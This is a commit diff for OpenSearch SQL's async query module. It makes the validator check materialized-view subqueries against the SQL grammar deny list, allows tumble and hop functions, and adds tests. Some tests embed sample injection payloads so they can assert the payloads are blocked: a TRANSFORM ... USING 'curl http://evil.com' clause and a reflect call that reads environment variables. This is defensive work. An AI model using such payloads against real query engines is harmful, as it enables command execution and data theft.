Skip to content

Commit 25529e7

Browse files
authored
[Enhancement] Validate materialized view subqueries against SQL grammar deny list (opensearch-project#5485)
Signed-off-by: Jialiang Liang <jiallian@amazon.com>
1 parent 9300574 commit 25529e7

4 files changed

Lines changed: 186 additions & 5 deletions

File tree

async-query-core/src/main/java/org/opensearch/sql/spark/validator/FunctionType.java

Lines changed: 2 additions & 0 deletions
Original file line number | Diff line number | Diff line change
@@ -184,6 +184,7 @@ public enum FunctionType {
184184
"from_unixtime",
185185
"from_utc_timestamp",
186186
"hour",
187+
"hop",
187188
"last_day",
188189
"localtimestamp",
189190
"make_date",
@@ -211,6 +212,7 @@ public enum FunctionType {
211212
"to_unix_timestamp",
212213
"to_utc_timestamp",
213214
"trunc",
215+
"tumble",
214216
"try_to_timestamp",
215217
"unix_date",
216218
"unix_micros",

async-query-core/src/main/java/org/opensearch/sql/spark/validator/SQLQueryValidator.java

Lines changed: 11 additions & 2 deletions
Original file line number | Diff line number | Diff line change
@@ -9,6 +9,7 @@
99
import org.apache.logging.log4j.LogManager;
1010
import org.apache.logging.log4j.Logger;
1111
import org.opensearch.sql.datasource.model.DataSourceType;
12+
import org.opensearch.sql.spark.dispatcher.model.IndexQueryDetails;
1213
import org.opensearch.sql.spark.utils.SQLQueryUtils;
1314

1415
/** Validate input SQL query based on the DataSourceType. */
@@ -38,10 +39,18 @@ public void validate(String sqlQuery, DataSourceType datasourceType) {
3839
}
3940

4041
/**
41-
* Validates a query from the Flint extension grammar. The method is currently a no-op.
42+
* Validates a Flint extension query by extracting and validating any embedded SQL subquery. For
43+
* CREATE MATERIALIZED VIEW statements, the inner query is validated against the same deny list
44+
* used for standard SQL queries.
4245
*
4346
* @param sqlQuery The Flint extension query to be validated
4447
* @param dataSourceType The type of the datasource the query is being run on
* @throws IllegalArgumentException when the embedded materialized-view query is rejected; the
*     unit tests for this method expect this for TRANSFORM and reflect on S3GLUE (presumably
*     raised inside validate(String, DataSourceType) - confirm there)
4548
*/
46-
public void validateFlintExtensionQuery(String sqlQuery, DataSourceType dataSourceType) {}
49+
public void validateFlintExtensionQuery(String sqlQuery, DataSourceType dataSourceType) {
50+
// Extract the index details from the Flint extension statement.
IndexQueryDetails indexQueryDetails = SQLQueryUtils.extractIndexDetails(sqlQuery);
51+
// Only the materialized-view query is inspected; nothing else from the details is read here.
String mvQuery = indexQueryDetails.getMvQuery();
52+
// A null mvQuery means there is nothing to validate, so the method returns without checks.
// NOTE(review): presumably null for statements without an AS <query> part (DROP/REFRESH,
// CREATE INDEX, CREATE SKIPPING INDEX) - verify against SQLQueryUtils.extractIndexDetails.
if (mvQuery != null) {
53+
// Reuse the standard SQL validation entry point for the extracted query.
validate(mvQuery, dataSourceType);
54+
}
55+
}
4756
}

async-query-core/src/test/java/org/opensearch/sql/spark/dispatcher/SparkQueryDispatcherTest.java

Lines changed: 71 additions & 0 deletions
Original file line number | Diff line number | Diff line change
@@ -501,6 +501,77 @@ void testDispatchShowMVQuery() {
501501
testDispatchBatchQuery("SHOW MATERIALIZED VIEW IN mys3.default");
502502
}
503503

504+
// Dispatches a CREATE MATERIALIZED VIEW whose inner query groups by window(...) and expects
// the request to go through: exactly one EMR Serverless job run is started and its id is
// returned in the dispatch response.
@Test
505+
void testDispatchMVWithWindowFunctionAllowed() {
506+
// Stub the EMR client factory, query id provider and job start so dispatch can complete.
when(emrServerlessClientFactory.getClient(any())).thenReturn(emrServerlessClient);
507+
when(queryIdProvider.getQueryId(any(), any())).thenReturn(QUERY_ID);
508+
when(emrServerlessClient.startJobRun(any())).thenReturn(EMR_JOB_ID);
509+
DataSourceMetadata dataSourceMetadata = constructMyGlueDataSourceMetadata();
510+
when(dataSourceService.verifyDataSourceAccessAndGetRawMetadata(
511+
MY_GLUE, asyncQueryRequestContext))
512+
.thenReturn(dataSourceMetadata);
513+
514+
// Auto-refreshing MV definition that aggregates over window(`@timestamp`, '1 Minutes').
String query =
515+
"CREATE MATERIALIZED VIEW my_glue.default.mv_window AS"
516+
+ " SELECT window.start AS `start.time`, COUNT(*) AS count"
517+
+ " FROM my_glue.default.http_logs WHERE status != 200"
518+
+ " GROUP BY window(`@timestamp`, '1 Minutes')"
519+
+ " WITH (auto_refresh = true, refresh_interval = '1 Minutes',"
520+
+ " checkpoint_location = 's3://bucket/checkpoint',"
521+
+ " watermark_delay = '10 Minutes')";
522+
523+
DispatchQueryResponse response =
524+
sparkQueryDispatcher.dispatch(getBaseDispatchQueryRequest(query), asyncQueryRequestContext);
525+
// The job must have been submitted exactly once, and its id surfaced to the caller.
verify(emrServerlessClient, times(1)).startJobRun(any());
526+
assertEquals(EMR_JOB_ID, response.getJobId());
527+
}
528+
529+
// Dispatches a CREATE MATERIALIZED VIEW whose inner query groups by TUMBLE(...) and expects
// the request to go through: exactly one EMR Serverless job run is started and its id is
// returned in the dispatch response.
@Test
530+
void testDispatchMVWithTumbleFunctionAllowed() {
531+
// Stub the EMR client factory, query id provider and job start so dispatch can complete.
when(emrServerlessClientFactory.getClient(any())).thenReturn(emrServerlessClient);
532+
when(queryIdProvider.getQueryId(any(), any())).thenReturn(QUERY_ID);
533+
when(emrServerlessClient.startJobRun(any())).thenReturn(EMR_JOB_ID);
534+
DataSourceMetadata dataSourceMetadata = constructMyGlueDataSourceMetadata();
535+
when(dataSourceService.verifyDataSourceAccessAndGetRawMetadata(
536+
MY_GLUE, asyncQueryRequestContext))
537+
.thenReturn(dataSourceMetadata);
538+
539+
// Manually refreshed MV definition that aggregates over TUMBLE(`@timestamp`, '6 Hours').
String query =
540+
"CREATE MATERIALIZED VIEW my_glue.default.mv_tumble AS"
541+
+ " SELECT window.start AS `start.time`, COUNT(*) AS count"
542+
+ " FROM my_glue.default.http_logs WHERE status != 200"
543+
+ " GROUP BY TUMBLE(`@timestamp`, '6 Hours')"
544+
+ " WITH (auto_refresh = false)";
545+
546+
DispatchQueryResponse response =
547+
sparkQueryDispatcher.dispatch(getBaseDispatchQueryRequest(query), asyncQueryRequestContext);
548+
// The job must have been submitted exactly once, and its id surfaced to the caller.
verify(emrServerlessClient, times(1)).startJobRun(any());
549+
assertEquals(EMR_JOB_ID, response.getJobId());
550+
}
551+
552+
// Dispatches a CREATE MATERIALIZED VIEW whose inner query uses TRANSFORM ... USING and expects
// dispatch to fail with an IllegalArgumentException before the EMR client is ever touched.
@Test
553+
void testDispatchMVWithTransformBlocked() {
554+
// Only datasource access is stubbed; no EMR client stubs are set up in this test.
DataSourceMetadata dataSourceMetadata = constructMyGlueDataSourceMetadata();
555+
when(dataSourceService.verifyDataSourceAccessAndGetRawMetadata(
556+
MY_GLUE, asyncQueryRequestContext))
557+
.thenReturn(dataSourceMetadata);
558+
559+
// MV definition embedding a TRANSFORM clause that names an external command.
String query =
560+
"CREATE MATERIALIZED VIEW my_glue.default.mv_exploit AS"
561+
+ " SELECT TRANSFORM(status) USING 'curl http://evil.com' AS x"
562+
+ " FROM my_glue.default.http_logs"
563+
+ " WITH (auto_refresh = false)";
564+
565+
IllegalArgumentException exception =
566+
Assertions.assertThrows(
567+
IllegalArgumentException.class,
568+
() ->
569+
sparkQueryDispatcher.dispatch(
570+
getBaseDispatchQueryRequest(query), asyncQueryRequestContext));
571+
// The rejection message must name the offending element, and no job may have been started.
Assertions.assertTrue(exception.getMessage().contains("TRANSFORM is not allowed"));
572+
verifyNoInteractions(emrServerlessClient);
573+
}
574+
504575
@Test
505576
void testRefreshIndexQuery() {
506577
when(emrServerlessClientFactory.getClient(any())).thenReturn(emrServerlessClient);

async-query-core/src/test/java/org/opensearch/sql/spark/validator/SQLQueryValidatorTest.java

Lines changed: 102 additions & 3 deletions
Original file line number | Diff line number | Diff line change
@@ -12,7 +12,6 @@
1212
import static org.mockito.Mockito.when;
1313

1414
import java.util.Arrays;
15-
import java.util.UUID;
1615
import lombok.AllArgsConstructor;
1716
import lombok.Getter;
1817
import org.antlr.v4.runtime.CommonTokenStream;
@@ -577,11 +576,111 @@ void testSecurityLakeQueries() {
577576
}
578577

579578
// Checks that a CREATE MATERIALIZED VIEW wrapping a plain "select * from table" is accepted
// when the S3 Glue grammar element validator is in effect.
@Test
580-
void testValidateFlintExtensionQuery() {
579+
void testValidateFlintExtensionQuery_safeQuery() {
580+
// Any datasource lookup on the mocked provider yields the real S3 Glue validator.
when(mockedProvider.getValidatorForDatasource(any()))
581+
.thenReturn(new S3GlueSQLGrammarElementValidator());
582+
assertDoesNotThrow(
583+
() ->
584+
sqlQueryValidator.validateFlintExtensionQuery(
585+
"CREATE MATERIALIZED VIEW mv AS select * from table WITH (auto_refresh = false)",
586+
DataSourceType.S3GLUE));
587+
}
588+
589+
// Checks that a CREATE MATERIALIZED VIEW whose inner query uses TRANSFORM ... USING is
// rejected with an IllegalArgumentException under the S3 Glue grammar element validator.
@Test
590+
void testValidateFlintExtensionQuery_blocksTransformInMV() {
591+
// Any datasource lookup on the mocked provider yields the real S3 Glue validator.
when(mockedProvider.getValidatorForDatasource(any()))
592+
.thenReturn(new S3GlueSQLGrammarElementValidator());
593+
assertThrows(
594+
IllegalArgumentException.class,
595+
() ->
596+
sqlQueryValidator.validateFlintExtensionQuery(
597+
"CREATE MATERIALIZED VIEW mv AS SELECT TRANSFORM(id) USING 'cmd' AS x FROM tbl"
598+
+ " WITH (auto_refresh = false)",
599+
DataSourceType.S3GLUE));
600+
}
601+
602+
// Checks that a CREATE MATERIALIZED VIEW whose inner query calls reflect(...) is rejected
// with an IllegalArgumentException under the S3 Glue grammar element validator.
@Test
603+
void testValidateFlintExtensionQuery_blocksReflectInMV() {
604+
// Any datasource lookup on the mocked provider yields the real S3 Glue validator.
when(mockedProvider.getValidatorForDatasource(any()))
605+
.thenReturn(new S3GlueSQLGrammarElementValidator());
606+
assertThrows(
607+
IllegalArgumentException.class,
608+
() ->
609+
sqlQueryValidator.validateFlintExtensionQuery(
610+
"CREATE MATERIALIZED VIEW mv AS SELECT reflect('java.lang.System', 'getenv',"
611+
+ " 'PATH') FROM tbl WITH (auto_refresh = false)",
612+
DataSourceType.S3GLUE));
613+
}
614+
615+
// Checks that Flint statements other than CREATE MATERIALIZED VIEW (DROP / REFRESH of a
// materialized view, CREATE SKIPPING INDEX) are accepted. No grammar validator is stubbed on
// the mocked provider in this test.
@Test
616+
void testValidateFlintExtensionQuery_nonMVStatementsPass() {
617+
// DROP MATERIALIZED VIEW
assertDoesNotThrow(
618+
() ->
619+
sqlQueryValidator.validateFlintExtensionQuery(
620+
"DROP MATERIALIZED VIEW mv", DataSourceType.S3GLUE));
621+
// REFRESH MATERIALIZED VIEW
assertDoesNotThrow(
622+
() ->
623+
sqlQueryValidator.validateFlintExtensionQuery(
624+
"REFRESH MATERIALIZED VIEW mv", DataSourceType.S3GLUE));
625+
// CREATE SKIPPING INDEX
assertDoesNotThrow(
626+
() ->
627+
sqlQueryValidator.validateFlintExtensionQuery(
628+
"CREATE SKIPPING INDEX ON tbl (col VALUE_SET)", DataSourceType.S3GLUE));
629+
}
630+
631+
// Checks that an auto-refreshing CREATE MATERIALIZED VIEW grouping by window(...) is accepted
// under the S3 Glue grammar element validator.
@Test
632+
void testValidateFlintExtensionQuery_mvWithWindowFunction() {
633+
// Any datasource lookup on the mocked provider yields the real S3 Glue validator.
when(mockedProvider.getValidatorForDatasource(any()))
634+
.thenReturn(new S3GlueSQLGrammarElementValidator());
635+
assertDoesNotThrow(
636+
() ->
637+
sqlQueryValidator.validateFlintExtensionQuery(
638+
"CREATE MATERIALIZED VIEW ds.default.mv AS SELECT window.start AS `start.time`,"
639+
+ " COUNT(*) AS count FROM ds.default.http_logs WHERE status != 200"
640+
+ " GROUP BY window(`@timestamp`, '1 Minutes')"
641+
+ " WITH (auto_refresh = true, refresh_interval = '1 Minutes',"
642+
+ " checkpoint_location = 's3://bucket/checkpoint',"
643+
+ " watermark_delay = '10 Minutes')",
644+
DataSourceType.S3GLUE));
645+
}
646+
647+
// Checks that a CREATE MATERIALIZED VIEW grouping by TUMBLE(...) is accepted under the
// S3 Glue grammar element validator.
@Test
648+
void testValidateFlintExtensionQuery_mvWithTumbleFunction() {
649+
// Any datasource lookup on the mocked provider yields the real S3 Glue validator.
when(mockedProvider.getValidatorForDatasource(any()))
650+
.thenReturn(new S3GlueSQLGrammarElementValidator());
651+
assertDoesNotThrow(
652+
() ->
653+
sqlQueryValidator.validateFlintExtensionQuery(
654+
"CREATE MATERIALIZED VIEW ds.default.mv AS SELECT window.start AS `start.time`,"
655+
+ " COUNT(*) AS count FROM ds.default.http_logs WHERE status != 200"
656+
+ " GROUP BY TUMBLE(`@timestamp`, '6 Hours')"
657+
+ " WITH (auto_refresh = false)",
658+
DataSourceType.S3GLUE));
659+
}
660+
661+
// Checks that a CREATE MATERIALIZED VIEW grouping by HOP(...) is accepted under the
// S3 Glue grammar element validator.
@Test
662+
void testValidateFlintExtensionQuery_mvWithHopFunction() {
663+
// Any datasource lookup on the mocked provider yields the real S3 Glue validator.
when(mockedProvider.getValidatorForDatasource(any()))
664+
.thenReturn(new S3GlueSQLGrammarElementValidator());
665+
assertDoesNotThrow(
666+
() ->
667+
sqlQueryValidator.validateFlintExtensionQuery(
668+
"CREATE MATERIALIZED VIEW ds.default.mv AS SELECT window.start AS `start.time`,"
669+
+ " COUNT(*) AS count FROM ds.default.http_logs"
670+
+ " GROUP BY HOP(`@timestamp`, '5 Minutes', '10 Minutes')"
671+
+ " WITH (auto_refresh = false)",
672+
DataSourceType.S3GLUE));
673+
}
674+
675+
// Checks that a CREATE INDEX (covering index) statement with refresh options is accepted.
// No grammar validator is stubbed on the mocked provider in this test. This replaces the
// earlier case that passed a random UUID string with DataSourceType.SECURITY_LAKE.
@Test
676+
void testValidateFlintExtensionQuery_coveringIndexPass() {
581677
assertDoesNotThrow(
582678
() ->
583679
sqlQueryValidator.validateFlintExtensionQuery(
584-
UUID.randomUUID().toString(), DataSourceType.SECURITY_LAKE));
680+
"CREATE INDEX idx ON ds.default.http_logs (status, day, clientip)"
681+
+ " WITH (auto_refresh = true, refresh_interval = '5 minute',"
682+
+ " checkpoint_location = 's3://bucket/checkpoint')",
683+
DataSourceType.S3GLUE));
585684
}
586685

587686
@Test

0 commit comments

Comments
 (0)